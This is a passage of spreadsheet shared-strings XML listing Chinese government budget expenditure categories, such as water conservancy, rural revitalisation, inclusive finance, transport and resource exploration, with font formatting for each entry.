  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>防汛</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>抗旱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村水利</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利技术推广</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际河流治理与管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>江河湖库水系综合整治</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>大中型水库移民后期扶持专项支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利安全监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利建设征地及移民支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村人畜饮水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>南水北调工程建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>南水北调工程管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他水利支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>巩固脱贫衔接乡村振兴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村基础设施建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生产发展</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会发展</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>贷款奖补和贴息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      “</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>三西</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业建设专项补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他巩固脱贫衔接乡村振兴支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村综合改革</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对村级公益事业建设的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有农场办社会职能改革补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对村民委员会和村党支部的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对村集体经济组织的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村综合改革示范试点补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他农村综合改革支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>普惠金融发展支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>支持农村金融机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业保险保费补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>创业担保贷款贴息及奖补</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>补充创业担保贷款基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他普惠金融发展支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>目标价格补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>棉花目标价格补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他目标价格补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他农林水支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>化解其他公益性乡村债务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他农林水支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交通运输支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公路水路运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公路建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公路养护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交通运输信息化建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公路和运输安全</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公路还贷专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公路运输管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公路和运输技术标准化建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>港口设施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>航道维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>船舶检验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>救助打捞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>内河运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>远洋运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海事管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>航标事业发展支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水路运输管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>口岸建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他公路水路运输支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>铁路运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>铁路路网建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>铁路还贷专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>铁路安全</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>铁路专项运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行业监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他铁路运输支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民用航空运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>机场建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>空管系统建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民航还贷专项支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民用航空安全</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民航专项运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他民用航空运输支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>邮政业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>邮政普遍服务与特殊服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他邮政业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>车辆购置税支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>车辆购置税用于公路等基础设施建设支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>车辆购置税用于农村公路建设支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>车辆购置税用于老旧汽车报废更新补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>车辆购置税其他支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他交通运输支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公共交通运营补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他交通运输支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资源勘探工业信息等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资源勘探开发</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>煤炭勘探开采和洗选</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>石油和天然气勘探开采</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
